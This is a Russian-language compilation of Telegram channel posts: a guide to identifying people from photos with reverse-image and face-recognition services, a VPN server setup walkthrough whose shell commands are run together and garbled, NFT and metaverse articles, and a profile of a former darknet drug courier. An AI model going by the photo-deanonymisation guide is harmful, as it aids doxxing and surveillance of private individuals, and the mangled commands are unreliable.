Социальные сети Instagram, Facebook, Twitter, ВК - стирают метаданные, а вот Google+, Google Photo, Flickr, Tumblr - нет.

Поиск по фото

Как бы банально это не звучало, всегда начинайте свой поиск с обычных на первый взгляд поисковиков:

https://yandex.ru/images/

https://images.google.com/

https://go.mail.ru/search_images

https://tineye.com/

https://www.bing.com/visualsearch

Не стоит недооценивать поисковики, их кэш содержит необъятное количество изображений, в том числе и из социальных сетей. Для такого вида поиска вам ничего не потребуется, кроме самой фотографии. Ну, а если поиск не принес никаких результатов, то идем дальше.

Фотография сама по себе уже может содержать полезные в поиске вещи. Обратите внимание на примечательные объекты на заднем фоне, это может быть вывеска, кафе, улица - все, что способно дать подсказку, в какой стране, городе или улице она была сделана.

WolframAlpha может делать много вещей, связанных с технической и исторической составляющей: его применение ограничено только вашим воображением.

Распознавание лица

Существует огромное количество сервисов, по которым вы самостоятельно можете пробить человека по фото. Делимся самыми популярными и рабочими:

instadp.com - позволяет скачать полноразмерную аватарку из инстаграма.

https://vk.watch/ - поиск информации о человеке ВК, имеет большой архив исторических данных сервиса. Аналог FindFace, который более не работает.

Betaface free online demo - Face recognition, Face search, Face analysis - сравнительный анализ фото. Определит вероятность того, что на двух разных фотографиях один и тот же человек.

https://tineye.com/ - поиск первоисточника фотографии и всех доменов где она хоститься. Минусом является то, что за результат надо платить.

https://www.duplichecker.com/reverse-image-search.php - находит похожие изображения, а так же выдает список сайтов, где есть это фото.

https://github.com/solkogan/searchface - сервис скачивает фото пользователей ВК в рамках одного указанного города, и создает базу биометрических данных этих лиц, связывая их с аккаунтами ВК. Отлично работает с маленькими городами. И самое приятное, что за использование не нужно ничего платить.

pictriev - определяет возраст человека на фотографии.

https://azure.microsoft.com/ru-ru/services/cognitive-services/face/ - сервис от Microsoft Azure предназначенный для сравнения лиц. Нужно лишь перейти по ссылке и вставить два изображения, которые и будем исследовать.
https://i.gyazo.com/8415135d7b7fcd2edaf46a5569987cf2.jpg

Поиск по картам и описанию

Когда вы смогли определить примерный район или приблизительную местность, где была сделана фотография, начинайте исследовать с помощью Google Maps, а именно Street View. Вы удивитесь, но довольно часто такой поиск заканчивается успешно. Спутниковые снимки различных поисковиков - ваш хороший помощник.

https://www.freemaptools.com/ - сервис с расширенными возможностями для поиска на карте.

https://www.openstreetmap.org/ - сайт создан сообществом картографов, которые добавляют и поддерживают данные о дорогах, тропах, кафе, вокзалах и о многих других объектах по всему миру.

Если на фотографии помимо человека есть уникальные объекты, которые можно описать словами, то попытайте свою удачу, введя словесные запрос в поисковике на русском или английском языках.

Но что делать если описать фото не получается? Допустим на заднем фоне виднеются горы, а мы знаем, что объять их количество невозможно. В таком случае на помощь приходит wikimapia.org, где вы можете отфильтровать запрос по всему что угодно. Выберите "показать все горные массивы" и исследуйте карту, пока не найдете нечто похожее, что изображено на фото.

Вывод

Существует большое количество способов пробить человека по фотографии и не только. Это всего лишь верхушка айсберга. Возможности OSINT безграничны.

Если вы еще не ознакомились в предыдущими статьями на тему деанона, то советуем сделать это прямо сейчас:

https://telegra.ph/Nazovi-mne-svoe-i...heloveka-02-22

https://telegra.ph/Nazovi-mne-svoe-i...m-setyam-02-27


https://telegra.ph/Kak-probit-chelov...tografii-03-04

https://i.gyazo.com/3daf515390f16712d5cf5921ef8a61c5.jpg

Инструкция по созданию собственного VPN-сервера

Вступить в наш чат



Хотите защитить и скрыть свой трафик от провайдера, хакеров и спецслужб, а также получить доступ к заблокированным сайтам в вашей стране? Способ один - VPN. Если вы цените приватность и анонимность своих действий в интернете, то использование VPN - лучшее решение. И исполнить его можно 2 путями:



Выбрать VPN-провайдера. Это самый простой и оптимальный вариант, если вы не хотите вникать в процесс создания сервера. К тому же, вы, должно быть, уже знакомы с ТОП-5 лучших провайдеров, если нет, то кликайте тут.

Создать свой VPN-сервер.


https://i.gyazo.com/bd1ca5b04e0db612b3b8cad32a8c7cd5.jpg

Если вам интересно попробовать себя в роли программиста или вы хотите освежить знания, то предлагаю сегодня разобраться, как создать свой VPN-сервер. Настройка не предполагает конкретные знания в этом деле, все что вам нужно - это желание и свободные 15 минут вашего времени.

Пробежимся по основным + и - своего VPN-сервера.

Плюсы:


неизменная скорость;

вы один на IP-адресе;

независимость от VPN-сервисов.
Минусы:


создание требует навыков;

высокая вероятность хакерской атаки на сервер.


Выбор страны для VPN-сервера

При выборе страны обычно руководствуются следующими критериями:


расстояние до вас: чем ближе страна, тем выше скорость соединения, и наоборот.

отсутствие запретов: доступность всех сервисов.

отношения стран: важно, чтобы между вашей страной и страной, где будет VPN-севрер была минимальная политическая напряженность. Но с другой стороны, эта же напряженность может сыграть вам на руку. Например, многие российские пользователи выбирают расположение своего VPN-сервера в Великобритании как раз из-за высокой напряженности между странами, если что-то произойдет, то последняя ни за что не сольет трафик российским спецслужбам.



Российским пользователям лучше всего остановить выбор на странах Евросоюза.


Выбор протокола

VPN протокол - это свод правил, которые определяют какой тип соединения будет между вашим устройством и VPN-сервером.

Существуют следующие виды протоколов:


OpenVPN

PPTP

L2TP

IKEv2



Мы же советуем выбрать OpenVPN, который используется в качестве основного практически всеми VPN-сервисами.


Как создать свой VPN-сервер

1. Выбираем хостинг для VPN-сервера

Для создания своего VPN-сервер, нам в первую очередь нужно арендовать виртуальный выделенный сервер (Virtual Private Server) у хостинг-провайдера. Самыми популярными хостинговыми сервисами являются:

► Amazon Web Services

► DigitalOcean

► Hetzner

► Vultr

► Bluehost

► Arubacloud

2. Настраиваем OpenVPN

Как только вы арендовали VPS-сервер, требуется подключиться к нему с помощью данных авторизации по SSH. Сделать это можно с помощью PuTTY.

Затем открываем консоль нашего сервера и прописываем команды в таком же порядке:

apt-get update&&apt-get upgradeapt-get install gitcd/rootgit clonecd openvpn-install****d + x openvpn-install.sh./openvpn-install.sh

Если вы вели все команды верно, то у вас должен запуститься специальный скрипт, настраивающий сервер автоматически. Во время настройки вам лишь нужно будет давать согласие, а в конце создать имя клиента.

3. Подключаемся к VPN-серверу

Итак, теперь на VPS-сервере есть файл с расширением .ovpn, который нужно переместить на то устройство, где будет подключен VPN.

4. Устанавливаем программу OpenVPN

OpenVPN требует установки своего приложения, поэтому переходим на официальный сайт и скачиваем. OpenVPN поддерживает:

https://i.gyazo.com/9ed129728a659d63a4ab8f2b76d5ded2.jpg

После установки нам нужно подключиться к нашему VPN-серверу, используя ранее созданные файлы с расширением .ovpn.

Заключение

Таким образом, мы научились настраивать VPN-сервер, который полностью защищен и недоступен ни для провайдера, ни для недоброжелателей. Теперь вы можете не беспокоиться о своей анонимности, подключаясь к Wi-Fi. Стоит отметить, что если вы много путешествуете, то вы можете создать неограниченное количество VPN-серверов и подключаться к любому из них в зависимости от вашего местоположения: это даст дополнительный уровень защиты и увеличит скорость соединения.

Дополнительные материалы к статье:


VPN от А до Я

VPN на роутере: что это такое и как настроить

Учимся взламывать Wi-Fi всего за несколько шагов


https://telegra.ph/Instrukciya-po-so...-servera-02-08

https://i.gyazo.com/85afcc6ec388ba0e7ca79ff3792f8587.jpg

Бум цифрового искусства NFT

Вступить в наш чат

Несмотря на то что NFT появились на свет в 2017 году, настоящий фурор произошел только в 2021 году. Оборот NFT за текущий год составил $22 млрд, а в 2020 достиг всего $100 млн. Связано это с тем, что многие люди видят в NFT популярный тренд и идут на его поводу. В 2021 году каждая вторая знаменитость, компания выпустили свои уникальные токены на продажу. Так, человек, ранее далекий от мира криптовалют, изъявил желание приобрести или создать свой собственный NFT. В предыдущей статье мы с вами разобрали, что лежит в основе NFT, как его создать и т.д.

Сегодня же мы с вами поговорим о самых дорогих токенах, которые принесли миллионы долларов своим владельцам и разберемся в феномене популярности и ценности.

Что же продают в виде NFT?

Мы можем разделить NFT-токены на 4 большие группы:

Игры. Это могут быть уникальные персонажи, виртуальные участки земли, необычные карточки. Данная категория отличается от других тем, что вы можете найти применение купленным вещам в игре.

Искусство. Аналог традиционным произведениям: пиксельные картинки Nyan Cat, Бэнкси, скучающие обезьяны и многое другое.

Предметы коллекционирования. Аватарки, карточки, фигурки и другие штуки для пополнения виртуальной коллекции. Ажиотаж вокруг них происходит по той причине, что выпускаются они в ограниченном тираже.

Социальные токены. Они включают в себя личные токены и токены сообщества. Последние используются для членств или сообществ. Таким образом, если вы покупаете такой токен, то вам открывается доступ к приватным чатам в Telegram, серверам Discord и т. д. Создатели также зачастую поощряют держателей токенов, устраивая различные конкурсы.


Вашему вниманию представлен ТОП-10 самых дорогих и необычных NFT-токенов. Приготовьтесь удивляться!

①Одной из первых громких сделок стала продажа гифки летящего кота с туловищем из печенья Nyan Cat.

https://i.gyazo.com/35a06b9d9f082c7f2b9b2313fc1306fc.jpg

Создателю сего шедевра Крису Торресу посчастливилось заработать 300 ETH, на сегодняшний день это более 90 млн рублей. Торрес немного видоизменил оригинал и улучшил разрешение.

https://i.gyazo.com/d9a8d2b80b921976a808b7b578d151cd.jpg

Бипл продал самый дорогой NFT за всю историю, который он собрал в виде коллажа "Каждый день: первые 5000 дней". Художник рисовал каждый день по картине, после чего объединил их в 1 NFT, который продал на аукционе за $69.3 миллионов.

https://i.gyazo.com/86122b15d94b1b58a407381da9a8739e.jpg

③

CryptoPunks - еще одна из нашумевших коллекций. Она состоит из десяти тысяч аватаров, на которых изображены панки с разными отличительными чертами.

https://i.gyazo.com/a80a29d9af328e929f9fcb0614251673.jpg

Самым дорогим NFT из коллекции на данный момент считается панк под номером 7523, именуемый "Чужой", его продажа принесла $11,8 млн.

https://i.gyazo.com/b32aa175f14a06ebe6e0d5d45d55f83e.png

Панки под номерами 7804 ($7.6 млн) и 3100 ($7.67 млн) тоже не обошлись без особого внимания.

④Серия NFT Bored Ape Yacht Club состоит из 10000 обезьян с непохожими образами: очки, повязки, головные уборы, аксессуары, даже пирсинг. Приобрести токен из коллекции значит стать членом почетного клуба. На сегодняшний день покупатели уже оценили некоторые привилегии, такие как бесплатные бонусные NFT и доступ к эксклюзивным товарам.

https://i.gyazo.com/53f47fa1f669f2ca713126c696475c88.jpg

Минимальная цена за токен с обезьяной начинается от 59,0 ETH, а максимальная достигает 769,0 ETH. В сентябре набор из 101 NFT из данной коллекции ушел на аукционе за $24,4 миллиона.

В недавнем времени произошел конфуз из-за того, что владелец допустил ошибку при выставлении цены, и вместо $300 000 продал NFT под номером 3547 за $3000. Опечатка была замечена, когда токен уже был куплен. Новый держатель уже выставил обезьяну на продажу, но уже за $321 000.

https://i.gyazo.com/de10cb693b2aff8cfbc66ed815333358.jpg

⑤Если панки и обезьяны вас не удивили, то посмотрите на следующие NFT-токены, которые также ушли за крупную сумму.

EtherRock - серия, состоящая из сотни одинаковых камней, которая была выпущена в 2017 году.

Так, камень под номером 21 недавно был продан за 45 ETH ($176 614 по нынешнему курсу).

https://i.gyazo.com/6edbfbed8cafdde0e0a2b3ee4dfc1dbf.jpg

Это не единственный проданный камень, общий объем торгов превысил $15,5 млн.

В интернете вы даже можете найти пошаговые "обучалки", как лучше и выгоднее купить NFT EtherRock.

⑥Сжечь картину, чтобы превратить ее в NFT. Такая участь постигла картину Бэнкси "Morons". Сожжение картины транслировалось online в YouTube и Twitter. После уничтожения был создан NFT-токен, ставший первым токеном, перенесенным из материального обличия в виртуальное. Этот ритуал был необходим для того, чтобы уничтожить оригинал и таким способом передать статус подлинника NFT. Он был продан за 228,69 ETH ($917 668 по курсу на момент написания).

https://i.gyazo.com/8349a1f1f0c2bbcf45fd81cb73e98ec0.jpg

⑦Crossroad - еще одно творение художника Бипл, представляющее из себя 10 секундное gif-изображение с оголенным Дональдом Трампом в парке. Резонанс этой картинки в том, что она могла бы измениться в зависимости от результатов выбором, то есть мы имели бы либо нынешнее изображение, либо с Трампом победителем.

https://i.gyazo.com/1bca10d79b35278df5efcacda91f5dec.jpg

Продажа принесла $6.6 миллионов и сделала Crossroad одним из самых дорогостоящих токенов.

⑧Певица Граймс выставила на аукцион серию работ, которые создала в сотрудничестве со своим братом Маком Бушером. Граймс заработала $5,8 миллиона менее чем за 30 минут, продав 10 NFT под названием "WarNymph". Некоторые работы были в единственном экземпляре, а другие - тиражом в сотни копий. А пиар-менеджером выступил ее муж Илон Маск, который опубликовал пост в твиттере.

https://i.gyazo.com/02fba0f85ad60f06ddb0e7aa891926a9.jpg

Новые держатели NFT снова продают многие работы, но теперь уже за $2,5 млн.

⑨Дом, в котором нельзя жить Mars House.Это первый виртуальный дом, который был выпущен в виде NFT. Создательница дома на Марсе Криста Ким продала NFT-токен за $500 000. "Войти" в дом можно с помощью шлема виртуальной реальности, загрузив файл в 3D-модели.

https://i.gyazo.com/05d4a5359a189bddb82da921d07d776a.jpg

Это не единственный дом в виртуальной реальности, появляется все больше и больше желающих инвестировать в виртуальную недвижимость.

⑩Участок в игре Axie Infinity «Genesis» Estate за $1,5 млн. Да, вы не ослышались. Покупатель приобрел 9 участков, которые обошлись ему в кругленькую сумму. Помимо земель в этой игре к покупке еще доступны различные уникальные персонажи Axies, которых вы можете покупать, выращивать, разводить и продавать в виде NFT.

https://i.gyazo.com/ab71eb92411210ac2a73c282d8390e1f.jpg

Ценность NFT

Возникает вопрос: "Для чего нужно покупать картину хоть и известного художника, если ее можно скачать бесплатно?"

Ответ прост - скачанная картинка не может принести прибыль, а NFT может. Так, ценность работы Бипла "Crossroad" выросла с $582 000 до $6.6 млн. NFT, как и любой другой актив имеет свойство дорожать, поэтому многие покупатели инвестируют в NFT с целью дальнейшей продажи, но уже по более высокой цене.

Нет четких правил за сколько следует покупать и продавать NFT, но есть несколько ключевых моментов, на которые стоит обращать внимание:

Известность - основной принцип при покупке NFT. Очевидно, что NFT, выпущенное популярным художником более ценно, чем NFT от no-name создателя.

Редкость. NFT в единственном экземпляре представляет большую ценность, чем в N-тираже.

Объем транзакций. Обращайте внимание на транзакционную активность, NFT с высокой активностью способствуют получению наибольшей прибыли.
Вывод

Логика покупателей, которые приобретают токены по бешеной цене проста: если что-то выпускается в лимитированном количестве, то в последствие оно будет только дорожать - к примеру, как и в ситуации с BTC. Но в данный момент мы наблюдаем спад биткоина, и никто точно не знает, что же с ним будет дальше. NFT, как и любая другая криптовалюта, не дает никаких гарантий вашей прибыли. Существует огромный риск понести убытки в случае, если ажиотаж вокруг NFT угаснет. Но пока цифры демонстрируют нам обратное: популярность и продажи растут, а знаменитости то и дело выпускают очередной NFT-токен.

https://telegra.ph/Bum-cifrovogo-iskusstva-NFT-03-09

https://i.gyazo.com/de08cc2733007d92bc04eb32aa016c07.jpg

Будущее за NFT и метавселенными?

Вступить в наш чат

Будь то MMORPG, конференция в Zoom или онлайн концерт любимого исполнителя, людям давно не нов виртуальный мир. Но с недавнего времени стала набирать обороты новая технология, именуемая как "метавселенная", хотя она схожа с концепцией многопользовательских игр - это намного больше, чем просто ролевая игра - это целый виртуальный мир.



Термин метавселенной возможно покажется для вас новым и незнакомым, но это не так, вы точно должны знать о чем идет речь. Теперь у вас возникает вопрос о том, что же все-таки представляет из себя метавселенная. Для того, чтобы ответить на него достаточно обратиться к истокам происхождения этого термина. Изначально понятие метавселенной появилось в книгах писателей-фантастов: в романе "Лавина" Н. Стивенсона оно обозначает виртуальный мир, который поражает своей схожестью с физической реальностью. Вслед за книгами стали появляться и другие известные для нас произведения "Матрица", "Аватар", "Первому игроку приготовиться".

https://i.gyazo.com/e4cca2f1794d73e1be94a882841d9a11.jpg

Но причем тут наш мир? Неужели фантастика становится реальностью? Давайте обо всем поподробнее.

Связь метавселенной и NFT

Эти два понятия зачастую неправильно понимаются и путаются в сознаниях людей, поэтому очень важно их различать. Для этого давайте дадим им определения.



Что такое NFT

NFT - это невзаимозаменяемые токены или, проще говоря, криптовалюта, которая хранятся в блокчейне.
NFT бывают в виде изображений, видео, аудио, коллекционных предметов в играх или любых других виртуальных объектах. Запись о владении NFT сохраняется в блокчейне, и её можно обменять на цифровые активы. Хотя NFT могут с легкостью быть скопированы и сохранены, это не будет являться "оригиналом", право собственности остается за владельцем, купившим NFT. Эта особенность и отличает невзаимозаменяемые токены от любой другой криптовалюты, поэтому NFT лежат в основе роста метавселенной.
Больше познавательной информации про NFT читайте в это статье.



Что такое метавселенная

Термин «метавселенная» можно разделить на две части - "мета" и "вселенная", где "мета" значит "за пределами". Иначе говоря, метавселенная - это новая дополнительная реальность за пределами вселенной или же параллельная виртуальная вселенная, существующая одновременно с реальным миром.
Метавселенная - это следующий уровень в развитии компьютерных технологий. На данный момент нет четкого представления, как она будет выглядеть в конечном итоге. Но уже сейчас присутствуют очки и гарнитуры виртуальной реальности, которые помогают полностью погрузиться в образ виртуального аватара.



Связь

Ключ к метавселенной можно найти в цифровой валюте, а именно в невзаимозаменяемых токенах. NFT дают права собственности на цифровые активы, например, вы можете использовать их для покупки и продажи виртуальной недвижимости, произведений искусства, билетов на концерты, путешествия. Так, NFT используются в метавселенных для преобретения собственности, которая дает право верифицированного цифрового владения. Главным катализатором метаэкономики является то, что любые цифровые товары можно купить и продать по усмотрению пользователей.

Метавселенные и компании

Компании гиганты уже давно проявили свой интерес к метавселенным. Только Цукерерг на проект метавселенной анонсировал $10 млрд и задействовал 10.000 сотрудников Facebook. И это далеко не единственная корпорация, заинтересованная в освоении метавселенной. Epic Games, Amazon, Microsoft, Unity и другие компании тоже делают свой вклад в развитие новой технологии. Даже YouTube задался целью создать собственную метавселенную и дать возможность видеоблогерам зарабатывать на ней с помощью NFT.
Предполагается, что вскоре мы будем учиться, работать, общаться и посещать различные мероприятия в метавселенной.
На данный момент самыми известными примерами метавселенной, хотя и в ограниченных формах, являются платформы виртуальной реальности Decentraland и Sandbox.

Зачем компании вкладывают $ млрд в метавселенную?

Бум вокруг метавселенной начался в 2021 году, тогда цены на виртуальную недвижимость выросли на 3000 %. Конечно же, большую роль сыграла изоляция, которая внесла свои коррективы в привычный уклад вещей. Огромное количество компаний перешли на удаленку - офисы опустели, а недвижимость упала в цене. Именно по этой причине все внимание компаний переместилось на виртуальную реальность. Цены на цифровую землю растут с каждым днем, а мировые гиганты открывают в метавселенных свои офисы.

Отличие метавселенной от игры:


Бесконечное существование. Метавселенная существует как полноценная реальность, поэтому она никогда не останавливается и не заканчивается.

Нет ограничений. Каждый человек может оказывать влияние на метавселенную, менять, создавать что-либо. Также нет никаких лимитов на количество пользователей.

Своя экономика или метаэкономика. Вы можете покупать, продавать, создавать и обменивать любые товары.

Объединяет виртуальный и физический миры.

Совместимость данных. Пользователи могут перемещать данные в виртуальных мирах. Например, перенести авто из GTA в Need for Speed.

Перспективы

Вот несколько основных идей метавселенных, которые выделил Марк Цукерберг:


Виртуальное пространство. Главной особенность метавселенной будет возможность переместиться в виртуальное трехмерное пространство. У вас будет создаваться ощущение, что все что происходит вокруг реально.

Общение. В будущем никто не будет разговаривать по телефону, вместо этого вы будете общаться с рядом сидящей голограммой.

Рабочий стол. Нужно создать рабочую обстановку, находясь при этом в кафе - легко. Вы увидите перед собой монитор с папками и ярлыками, так, как если бы вы работали дома или в офисе мечты.

Собрания. Вместо Zoom уже сейчас в США, по словам Марка, многие проводят собрания в VR. А в дальнейшем, если получится, - будут в метавселенной.

Бракосочетания. Первая церемония заключения брака уже состоялось в метавселенной Decentraland. Свидетельство о браке было выдано в виде NFT. Также процесс токенизации прошли и обручальные кольца пары.

Вывод

Последние пару лет сыграли огромную роль в зарождении метавселенной. Из фантастических романов и фильмов метавселенная переместилась в реальность, хоть и в самое начало ее развития. Трудно предугадать, сможем ли мы увидеть ее в том виде, в котором она существует в "Матрице" или "Первому игроку приготовиться", но мы точно можем сказать, что технологии развиваются, а интерес безусловно растет.
Велика вероятность, что метавселенная приобретет форму, о которой мы еще даже не догадываемся.
Если вы возлагаете большие надежды на метавселенную, то самое время вкладываться в цифровую недвижимость. О том, как приобрести NFT-землю вы узнаете в следующей части.

https://telegra.ph/Budushchee-za-NFT...elennymi-03-03

https://i.gyazo.com/2307ec73575b97f951c2e741bf820efd.jpg

Как купить NFT-землю

Вступить в наш чат

Современный мир диктует новые правила - виртуальная реальность заменяет физический мир, компании вкладывают миллиарды долларов в развитие метавселенной, а простые пользователи покупают виртуальные участки земли в виде NFT-токенов. Очевидно, что спрос на цифровую землю растет с каждым днем подобно рынку реальной недвижимости. Если вы все-таки решили всерьез задуматься над покупкой, то просто следуйте руководству.

https://i.gyazo.com/b55bd624beb265de174e99a3d9f54a7b.png

Что такое NFT-земля

NFT-земля - виртуальный участок в метавселенной с уникальным правом собственности, поскольку земля прикрепляется к конкретному NFT. Приобретая такую землю, вы можете открыть для себя доступ в развивающейся метавселенной и исследовать участок с помощью аватара или же перепродать его дороже, сдать в аренду. Не менее популярным вариантом использования NFT-земли является проведение ивентов, конференций. Также многие пользователи покупают земли для того, чтобы получить бонусы внутри игры.

Как купить NFT-землю в метавселенной

Покупка NFT-земли ничем не отличается от приобретения любого другого невзаимозаменяемого токена.

Сделать это можно 2 способами:

на распродаже проекта;

на NFT-маркетплейсах.
Что нужно:

цифровой кошелек;

криптовалюта.


Выбираем платформу

Первым действием нужно определиться с метавселенной, поскольку их отличают различные возможности. Выделяют на данный момент следующие платформы виртуальной реальности: Decentraland и Sandbox.

Мы для примера возьмем метавселенную The Sandbox на Ethereum.

Подключаем кошелек к The Sandbox Marketplace

Самыми подходящими вариантами являются кошельки Binance Chain Wallet и MetaMask. После того, как настроили один из них, то заходим на The Sandbox и смотрим на карте доступные участки земли. Некоторые из них можно купить непосредственно через The Sandbox Marketplace, а другие на сторонних биржах, таких как OpenSea. В нашем примере мы будем делать через The SandBox.

На главной странице SandBox в верхнем правом углу выберите "Sign In". Убедитесь, что кошелек настроен на блокчейн проекта, в данном случае Ethereum.Затем нажимаем на "Metamask".

https://i.gyazo.com/790e163b74ab029976643a5d06f3e4f0.jpg

После чего появится всплывающее окно, где нужно подтвердить подключение, нажав "Next".

https://i.gyazo.com/0c4b7b38e2c21fdc58cc0f04ecb81d2e.png

Cледующим шагом подключаемся к аккаунту, выбрав "Connect".

https://i.gyazo.com/01a698667641482b9ce742420d08f473.png

Учетная запись практически готова! Осталось указать email, никнейм, пароль и нажать "Continue". И завершаем создание аккаунта с помощью кнопки "Sign".

Готово. Теперь на сайте у вас появился баланс и аватарка.

https://i.gyazo.com/7bbcc991f52ff5271e024eb0d177f313.png

Покупаем ETH на Binance

Для того, чтобы купить участок нам понадобится криптовалюта - эфир, так как The Sandbox чаще всего принимает только его. Эфир вы можете приобрести на Binance с помощью кредитки.

https://i.gyazo.com/bd65e12ffed6e86afc2ae4f568133c8a.png

Далее нужно перевести активы на криптокошелек. Скопируйте публичный адрес криптокошелька и введите его в качестве адреса для вывода средств.

Выбираем участок

Отсортируйте участки с помощью фильтров. Поскольку значительная часть земель The Sandbox уже куплена, их можно купить только на OpenSea. Однако некоторые участки пока еще можно приобрести через карту The Sandbox. Кроме того, эта карта - отличный способ, чтобы удостовериться, что вы приобретаете надежную NFT-землю, так как ссылки OpenSea включены в интерфейс.

https://i.gyazo.com/7ce2c2c8cba593bdde6a3e9aaf493135.png

Как только определитесь с землей, выберите "Bid", чтобы поторговаться или купите по указанной цене.

https://i.gyazo.com/83e3eac76b8353ea5995bd22e7c98210.png

Продаем NFT-землю

Продать участок можно 2 способами:

на маркетплейсе метавселенной;

на сторонних торговых площадках.
В данный момент платформой Sandbox не предусмотрена прямая продажа. Для этого вам придется воспользоваться услугами вторичного рынка. Например, на OpenSea достаточно зайти в свой профиль, выбрать нужный NFT и нажать "Sell".

Что касается аренды участка, то в данный момент на Sandbox нельзя этого сделать официально и безопасно. Некоторые пользователи сами договариваются с арендаторами без поддержки сайта, но зачастую это заканчивается печально.

Вывод

Любая покупка подразумевает возможные риски, поэтому взвесьте все за и против перед тем как купить NFT-землю. Обязательно изучите метавселенную, в которую вы инвестируете и доверяйте только проверенным маркетплейсам.

Дополнительные материалы к статье:

NFT - феномен в мире криптовалют

Бум цифрового искусства NFT

Как NFT изменили жизнь Павла Сказкина: путь от наркокурьера до успешного художника

Будущее за NFT и метавселенными?


https://telegra.ph/Kak-kupit-NFT-zemlyu-03-03

https://i.imgur.com/vNh2u3o.jpg

Как NFT изменили жизнь Павла Сказкина: путь от наркокурьера до успешного художника

Вступить в наш чат




Знакомьтесь, Павел Сказкин, он же заключенный художник, успешно продающий свои NFT. Сегодня мы расскажем о его пути от даркнета до художника невзаимозаменяемых токенов.

От даркнета до тюрьмы

Как же Павел Сказкин докатился до такой жизни - в середине 2010-х площадки по продаже наркотиков в даркнете были наиболее востребованы:

"Внезапно появилась крипта, нижний интернет, теневые рынки, даркнет, - вспоминает Павел. - Я стал отовариваться там. В какой-то момент я набрел на объявление, что требуются сотрудники. Закончилось это тем, что я нахожусь тут". Работать он стал администратором в RAMP, продавая запрещенные препараты. О том как все происходило, он рассказывает:

"Товары и услуги прямиком из дьявольского сундука: все, что нельзя купить в обычном магазине, можно достать в даркнете (или можно было, на сегодняшние реалии не могу сказать). Сделки на площадках происходят по схеме: покупатель-гарант(площадка)-продавец. Отправленные покупателем средства поступают не напрямую к продавцу, а к гаранту, который получает комиссию за свои услуги. После подтверждения состоявшейся сделки обеими сторонами, средства отправляются гарантом продавцу".После должности администратора Павел решил попробовать себя в роли наркокурьера, и как результат оказался на зоне. Срок он получил - 6 лет лишения свободы с отбыванием наказания в колонии строгого режима за попытку распространения веществ запрещенных законодательством РФ в особо крупном размере, а именно марихуаны.

В тюремной библиотеке Сказкин изучил Уголовный Кодекс и сам подал прошение о смягчении наказания:

"Затянулось это на 11 месяцев и 5 судебных заседаний. В первых трех инстанциях суды отказывали мне и только после того, когда я дошел до Верховного суда РФ удалось получить положительное решение. Летом 2021 года я первый раз за 4 года и 6 месяцев вышел на свободу, увидел жену, маму и отправился в исправительный центр. Здесь у меня был доступ к гаджетам, и это существенно изменило мою жизнь".

Рисование = спасение

Рисование всегда было главным хобби для Павла. Рисовать он начал еще в детстве, но никогда не мог подумать, что в будущем его талант сыграет ему на руку. Так вышло, что его увлечение стало единственной отдушиной и спасением в тюрьме. Другие заключенные сразу же признали талант художника:

"Навыки рисования пригодились мне в местах лишения свободы, я рисовал на простынях, на досках для нард, делал открытки для других осужденных, рисовал стенгазеты по поручениям сотрудников исправительного учреждения. Ну и для себя я рисунки делал, просто потому что мне нравится. Отправлял детям, потому что подарков я никаких сделать не мог».Очень тяжело Сказкину давался информационный голод, поэтому для того, чтобы быть в курсе всех новостей, он выписывал доступные заключенным журналы. Именно из журналов и газет он узнал о NFT-токенах, так и зародилась идея попробовать себя в новом направлении, ведь многие эксперты заявляли, что будущее цифровых технологий за виртуальными мирами.

NFT

Встреча с Ильей Орловым в одном из телеграмм-каналов о NFT оказалась судьбоносной:

"Найдя русскоязычный чат об NFT, я стал расспрашивать пользователей о токенах, и в одной из бесед отправил в чат фото с колючей проволокой, на что получил массу вопросов. Именно тогда меня и заметил Илья. Попросил рассказать свою историю и показать рисунки. На тот момент я продал несколько своих NFT за 2-5$. Средств для размещения на дорогих и полузакрытых площадках у меня не было. Илья, поверивший в меня и в уникальность моей истории, проявил сумасшедший интерес к тому, что я делаю и взял на себя все финансовые затраты и продвижение моих работ".Он решил, что многих людей покорит история Павла, поэтому основным лейкмотивом его творчества и NFT в том числе выбрал тему заключения. Он решил, что акцент в позиционировании художника с никнеймом papasweeds нужно делать на истории его заключения: «Я жил на Западе, и я понимаю, что они там очень любят Достоевского за всю эту глубину, за боль. Они и Pussy Riot полюбили за то, как их ранила власть. И это для них как театр и шоу, которое продается. Я подумал, ну почему нет? Мы поможем Паше. Мы раскачаем проект».

Так художник под никнеймом papasweed и Илья Орлов всего за пару месяцев продали NFT на сумму более чем на 1 миллион рублей, 30 процентов от которых пошли на благотворительность "Руси сидящей".

NFT-токены Павла Сказкина

Первым NFT стала работа под названием "Hall of Shame" или "Зал стыда", на переднем плане которой мы видим полуобнаженного судью с молотком и пакетом с конфетами, а на заднем плане сидит плачущий ребенок. Продана эта работа была за 1 эфир или 2 881,04USD по нынешнему курсу.

Сам Павел Сказкин метафорично описал данную работу:

"Каждый приговор, произнесенный в зале суда, похож на смертный приговор. Годы вашей жизни мгновенно отнимаются. Я чувствовал себя беспомощным, уязвимым ребенком. Стыд, который я чувствовал перед женой и детьми, убивал меня. Я все смотрел на ее слезы и с трудом удерживался от слез, но на самом деле это могли быть слезы радости. Я повторяю себе: "Слава богу, прошло не десять лет", как будто это была проклятая мантра. Российская тюрьма - ужасное исправительное учреждение, призванное стыдить и ломать людей. Я пять лет изучал их учебную программу и скоро закончу".Вторая работа с названием "Испорченное" не менее поражает своей картинкой и душераздирающем описанием.

https://i.gyazo.com/f0fffbbf66c519421a9fba4000dcbcc7.jpg

"Всю свою жизнь я слышал от окружающих, что я делаю что-то не так. Это плохо, это невозможно, это недопустимо, этого не поймут. Я никогда не представлял это, но все повернулось так, что быть тем, кто ты есть на самом деле - это недопустимая роскошь, и большинству людей запрещено делать то, что они хотят, и быть тем, кем они хотят. Пытаясь пойти против системы, никогда не знаешь, где окажешься. Ты должен быть осторожен со своими желаниями, и в то же время не отказываться от мечты и надежды, хранить их в надежном месте, в своем сердце и душе".Третья же работа "Адский вызов" пронизана верой на светлое будущее.

"После всего этого унижения, через кровь, пот и слезы за российской решеткой, несмотря ни на что, я верю, что я почти победил в этом ужасающем раунде. В то же время я считаю, что это было послание от Вселенной, которое я принял достойно. Теперь мой черед бросать кости, бросить вызов - я обращаюсь к дикой Метавселенной, со всей ее неограниченностью и разнообразием: пусть игра начнется".

Вам возможно будет это интересно:

NFT - феномен в мире криптовалют

Бум цифрового искусства NFT


https://telegra.ph/Kak-NFT-izmenili-...dozhnika-02-26

https://i.gyazo.com/cb782344113679fc16e4b7619b57eccd.jpg

Как подделать номер телефона

Вступить в наш чат

